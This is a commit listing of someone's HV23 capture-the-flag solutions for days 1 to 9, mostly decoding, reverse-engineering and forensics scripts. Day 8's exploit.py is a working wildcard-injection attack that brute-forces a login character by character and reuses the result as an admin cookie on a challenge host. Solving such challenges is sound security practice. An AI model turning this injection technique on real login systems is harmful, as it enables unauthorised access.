Initial Commit Day 1-9
This commit is contained in:
commit
697849f63e
BIN
Day 1/a-letter-from-santa.zip
Normal file
BIN
Day 1/a-letter-from-santa.zip
Normal file
Binary file not shown.
32
Day 1/decode.py
Normal file
32
Day 1/decode.py
Normal file
@ -0,0 +1,32 @@
|
||||
import string
|
||||
from bs4 import BeautifulSoup
|
||||
from PIL import Image
|
||||
from pyzbar.pyzbar import decode
|
||||
|
||||
qr_size = 25
|
||||
pix_size = 10
|
||||
img_size = pix_size * qr_size
|
||||
|
||||
with open("templates/santa.j2", "r") as f:
|
||||
soup = BeautifulSoup(f.read(), "html.parser")
|
||||
img = Image.new("RGB", (img_size, img_size), "white")
|
||||
y = 0
|
||||
|
||||
for c in string.ascii_lowercase:
|
||||
bin_str = ""
|
||||
x = 0
|
||||
for e in soup.find_all("span"):
|
||||
if e.text.strip() == "{{" + c + "}}":
|
||||
if "a" in e["class"]:
|
||||
color = (0, 0, 0)
|
||||
else:
|
||||
color = (255, 255, 255)
|
||||
|
||||
for xi in range(x, x+pix_size):
|
||||
for yi in range(y, y+pix_size):
|
||||
img.putpixel((xi, yi), color)
|
||||
|
||||
x += pix_size
|
||||
y += pix_size
|
||||
|
||||
print("[+] Flag:", decode(img)[0].data.decode())
|
2
Day 1/templates/santa.j2
Normal file
2
Day 1/templates/santa.j2
Normal file
File diff suppressed because one or more lines are too long
3
Day 2/decode.py
Normal file
3
Day 2/decode.py
Normal file
@ -0,0 +1,3 @@
|
||||
data = "G d--? s+: a+++ C+++$ UL++++$ P--->$ L++++$ !E--- W+++$ N* !o K--? w O+ M-- V PS PE Y PGP++++ t+ 5 X R tv-- b DI- D++ G+++ e+++ h r+++ y+++"
|
||||
# "PGP++++" -> Philip Zimmerman
|
||||
print("[+] Flag: HV23{Philip Zimmerman}")
|
58
Day 3/decode.py
Normal file
58
Day 3/decode.py
Normal file
@ -0,0 +1,58 @@
|
||||
data = [
|
||||
["8","c","t","k","3"],
|
||||
["2","r","H","V","r"],
|
||||
["2","y",None,"0","v"],
|
||||
["2","e","n","3","_"],
|
||||
["}","3","h","{","m"],
|
||||
]
|
||||
|
||||
def find_char(c, min=(0, 0)):
|
||||
for x, row in enumerate(data):
|
||||
for y, v in enumerate(row):
|
||||
if v == c and (x, y) >= min:
|
||||
return (x, y)
|
||||
|
||||
|
||||
def find_key(cirb="HV23{"):
|
||||
min = (0, 0)
|
||||
key = []
|
||||
for c in cirb:
|
||||
key.append(find_char(c, min))
|
||||
min = key[-1]
|
||||
key[3] = (4, 1) # or (3, 3)
|
||||
key.append(rotate(find_char('}'), 3)) # for final '}'
|
||||
return key
|
||||
|
||||
def rotate(key, rotation):
|
||||
rotation = rotation % 4
|
||||
if rotation == 0:
|
||||
return key
|
||||
|
||||
n = len(data) - 1
|
||||
rotated = []
|
||||
|
||||
if isinstance(key, list):
|
||||
for (x, y) in key:
|
||||
rotated.append((y, n - x))
|
||||
else:
|
||||
rotated = (key[1], n - key[0])
|
||||
|
||||
if rotation > 1:
|
||||
return rotate(rotated, rotation - 1)
|
||||
|
||||
return rotated
|
||||
|
||||
def get_text(key, rotation=0):
|
||||
text = ""
|
||||
key = list(sorted(rotate(key, rotation)))
|
||||
for (x, y) in key:
|
||||
text += data[x][y]
|
||||
return text
|
||||
|
||||
key = find_key()
|
||||
|
||||
flag = ""
|
||||
for i in range(0, 4):
|
||||
flag += get_text(key, -i)
|
||||
|
||||
print("[+] Flag:", flag)
|
BIN
Day 4/bowser.elf
Executable file
BIN
Day 4/bowser.elf
Executable file
Binary file not shown.
26
Day 4/decode.py
Normal file
26
Day 4/decode.py
Normal file
@ -0,0 +1,26 @@
|
||||
from hackingscripts import util
|
||||
from pwn import context, disasm
|
||||
import re
|
||||
|
||||
if __name__ == "__main__":
|
||||
with open("bowser.elf", "rb") as f:
|
||||
elf = f.read()
|
||||
|
||||
context.arch = "amd64"
|
||||
offset = 0x1332
|
||||
flag = b""
|
||||
|
||||
for instr in disasm(elf[offset:], byte=False, offset=False).split("\n"):
|
||||
match = re.match(r"movabs\s+(rax|rdx),\s+0x([0-9a-f]+)", instr)
|
||||
if match:
|
||||
flag += util.xor(bytearray.fromhex(match[2])[::-1], 0xFF)
|
||||
else:
|
||||
match = re.match(r"mov\s+WORD PTR \[.*\],\s+0x([0-9a-f]+)", instr)
|
||||
if match:
|
||||
flag += util.xor(bytearray.fromhex(match[1])[::-1], 0xFF)
|
||||
elif re.match(r"call\s+.*", instr):
|
||||
break
|
||||
|
||||
flag = flag.split(b"\x00")[1].decode()
|
||||
print("[+] Flag:", flag)
|
||||
|
BIN
Day 5/aurora.mp4
Normal file
BIN
Day 5/aurora.mp4
Normal file
Binary file not shown.
47
Day 5/decode.py
Normal file
47
Day 5/decode.py
Normal file
@ -0,0 +1,47 @@
|
||||
from PIL import Image
|
||||
import os
|
||||
import sys
|
||||
import operator
|
||||
import subprocess
|
||||
import shutil
|
||||
|
||||
def extract_frames(destination):
|
||||
os.makedirs(destination, exist_ok=True)
|
||||
subprocess.run(["ffmpeg", "-i", "aurora.mp4", "frames/out-%03d.png"])
|
||||
print()
|
||||
|
||||
def parse_frame(file):
|
||||
img = Image.open(file)
|
||||
pix = img.load()
|
||||
return img.size, pix
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
output_directory = "frames"
|
||||
pixel_sum = None
|
||||
count = 0
|
||||
|
||||
extract_frames(output_directory)
|
||||
for file in sorted(os.listdir(output_directory)):
|
||||
if file.endswith(".png"):
|
||||
sys.stdout.write(f"\rAnalyzing: {file}")
|
||||
(width, height), pix = parse_frame(os.path.join(output_directory, file))
|
||||
if pixel_sum is None:
|
||||
pixel_sum = [[(0,0,0) for y in range(height)] for x in range(width)]
|
||||
|
||||
for x in range(width):
|
||||
for y in range(height):
|
||||
pixel_sum[x][y] = tuple(map(operator.add, pixel_sum[x][y], pix[x,y]))
|
||||
|
||||
count += 1
|
||||
|
||||
print("\nComposing new image")
|
||||
img = Image.new("RGB", (width, height))
|
||||
pix = img.load()
|
||||
|
||||
for x in range(width):
|
||||
for y in range(height):
|
||||
pix[x,y] = tuple(map(operator.floordiv, pixel_sum[x][y], [count] * 3))
|
||||
|
||||
img.save(f"result.png")
|
||||
shutil.rmtree(output_directory)
|
BIN
Day 5/result.png
Normal file
BIN
Day 5/result.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 296 KiB |
1
Day 6/.gitattributes
vendored
Normal file
1
Day 6/.gitattributes
vendored
Normal file
@ -0,0 +1 @@
|
||||
memory.raw filter=lfs diff=lfs merge=lfs -text
|
BIN
Day 6/cool-santa-claus.jpg
Normal file
BIN
Day 6/cool-santa-claus.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 186 KiB |
3
Day 6/extract.sh
Normal file
3
Day 6/extract.sh
Normal file
@ -0,0 +1,3 @@
|
||||
vol -f memory.raw windows.info
|
||||
vol -f memory.raw windows.filescan | grep -i "png\|jpg\|jpeg"
|
||||
vol -f memory.raw windows.dumpfiles --virtaddr 0x918b76c517f0
|
4480
Day 6/files.txt
Executable file
4480
Day 6/files.txt
Executable file
File diff suppressed because it is too large
Load Diff
3
Day 6/memory.raw
Executable file
3
Day 6/memory.raw
Executable file
@ -0,0 +1,3 @@
|
||||
version https://git-lfs.github.com/spec/v1
|
||||
oid sha256:0d38311133ba9580a4bac36aee55f4f08a75f0462cc040907a179ad4b4351c87
|
||||
size 2147483648
|
BIN
Day 6/wallpaper.png
Normal file
BIN
Day 6/wallpaper.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 1.6 MiB |
63
Day 7/exploit.py
Normal file
63
Day 7/exploit.py
Normal file
@ -0,0 +1,63 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
|
||||
# https://git.romanh.de/Roman/HackingScripts
|
||||
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
import json
|
||||
import time
|
||||
import base64
|
||||
import requests
|
||||
import subprocess
|
||||
import urllib.parse
|
||||
import string
|
||||
from bs4 import BeautifulSoup
|
||||
from hackingscripts import util, rev_shell
|
||||
from hackingscripts.fileserver import HttpFileServer
|
||||
|
||||
import socket
|
||||
from PIL import Image
|
||||
|
||||
from urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||
|
||||
HOST = "44c5decd-6619-4ce0-859a-882ed74f1736.rdocker.vuln.land"
|
||||
IP_ADDRESS = util.get_address()
|
||||
|
||||
def get_image_bytes():
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.connect((HOST, 80))
|
||||
sock.sendall(b"\n")
|
||||
|
||||
data = b""
|
||||
|
||||
while True:
|
||||
b = sock.recv(1024)
|
||||
if not b:
|
||||
break
|
||||
|
||||
data += b
|
||||
|
||||
body_offset = data.index(b"\n\n") # malformed here
|
||||
header, body = data[:body_offset], data[body_offset+2:]
|
||||
|
||||
return header, body
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
header, body = get_image_bytes()
|
||||
|
||||
flag = ""
|
||||
while body:
|
||||
offset_index = body.index(b"\r\n")
|
||||
chunk_size = int(body[0:offset_index], 16)
|
||||
offset = offset_index + 2
|
||||
chunk = body[offset:offset+chunk_size]
|
||||
body = body[offset+chunk_size+2:]
|
||||
|
||||
if chunk_size > 0x900:
|
||||
flag += chr(chunk_size & 0xFF)
|
||||
|
||||
print("[+] Flag:", flag)
|
BIN
Day 8/bask-source.zip
Normal file
BIN
Day 8/bask-source.zip
Normal file
Binary file not shown.
85
Day 8/exploit.py
Normal file
85
Day 8/exploit.py
Normal file
@ -0,0 +1,85 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
|
||||
# https://git.romanh.de/Roman/HackingScripts
|
||||
|
||||
import string
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
import json
|
||||
import time
|
||||
import base64
|
||||
import requests
|
||||
import subprocess
|
||||
import urllib.parse
|
||||
from bs4 import BeautifulSoup
|
||||
from hackingscripts import util, rev_shell
|
||||
from hackingscripts.fileserver import HttpFileServer
|
||||
|
||||
from urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||
|
||||
BASE_URL = "https://a26e7e66-6235-404e-8c62-051b082e0082.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
|
||||
IP_ADDRESS = util.get_address()
|
||||
|
||||
def request(method, uri, **kwargs):
|
||||
if not uri.startswith("/") and uri != "":
|
||||
uri = "/" + uri
|
||||
|
||||
client = requests
|
||||
if "session" in kwargs:
|
||||
client = kwargs["session"]
|
||||
del kwargs["session"]
|
||||
|
||||
if "allow_redirects" not in kwargs:
|
||||
kwargs["allow_redirects"] = False
|
||||
|
||||
if "verify" not in kwargs:
|
||||
kwargs["verify"] = False
|
||||
|
||||
if "proxies" not in kwargs:
|
||||
kwargs["proxies"] = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
|
||||
|
||||
return client.request(method, BASE_URL + uri, **kwargs)
|
||||
|
||||
def login(password):
|
||||
while True:
|
||||
# post payload is not URL decoded, so we can't use dictionary
|
||||
res = request("POST", "/login", data=f"password={password}")
|
||||
if "Successfully logged in" in res.text:
|
||||
return True
|
||||
elif "Invalid username or password!" in res.text:
|
||||
return False
|
||||
|
||||
def retrieve_flag(cookie):
|
||||
while True:
|
||||
res = request("GET", "/admin", cookies={"admin_token": cookie})
|
||||
util.assert_content_type(res, "text/html")
|
||||
if "You are not authorized to view this page." in res.text:
|
||||
return None
|
||||
else:
|
||||
match = re.search(r"Your flag is: (HV23\{.*\})", res.text)
|
||||
if match:
|
||||
return match[1]
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
password = "salami"
|
||||
flag = retrieve_flag(password)
|
||||
while flag is None:
|
||||
found = False
|
||||
for x in string.printable:
|
||||
if x in ["*", "\\"]:
|
||||
continue
|
||||
|
||||
if login(password + x + "*"):
|
||||
password += x
|
||||
found = True
|
||||
flag = retrieve_flag(password)
|
||||
break
|
||||
|
||||
if not found:
|
||||
break
|
||||
|
||||
print("[+] Flag:", flag)
|
22
Day 9/decode.py
Normal file
22
Day 9/decode.py
Normal file
@ -0,0 +1,22 @@
|
||||
import os
|
||||
import re
|
||||
import datetime
|
||||
from bs4 import BeautifulSoup
|
||||
from hackingscripts.pcap_file_extract import PcapExtractor, HttpRequest, HttpResponse
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
chars = []
|
||||
pcap_extractor = PcapExtractor("secret_capture.pcapng")
|
||||
for response in pcap_extractor:
|
||||
match = re.match(r"/\?door=(\d)", response.get_file_path())
|
||||
if match and isinstance(response, HttpResponse):
|
||||
request = response.response_to
|
||||
ip, port = request.socket.split(":")
|
||||
port = int(port)
|
||||
c = chr(port - 56700)
|
||||
dt = datetime.datetime.strptime(response.headers["Date"], "%a, %d %b %Y %H:%M:%S %Z").timestamp()
|
||||
chars.append((dt, c))
|
||||
|
||||
flag = "".join(entry[1] for entry in sorted(chars))
|
||||
print("[+] Flag:", flag)
|
BIN
Day 9/secret_capture.pcapng
Normal file
BIN
Day 9/secret_capture.pcapng
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user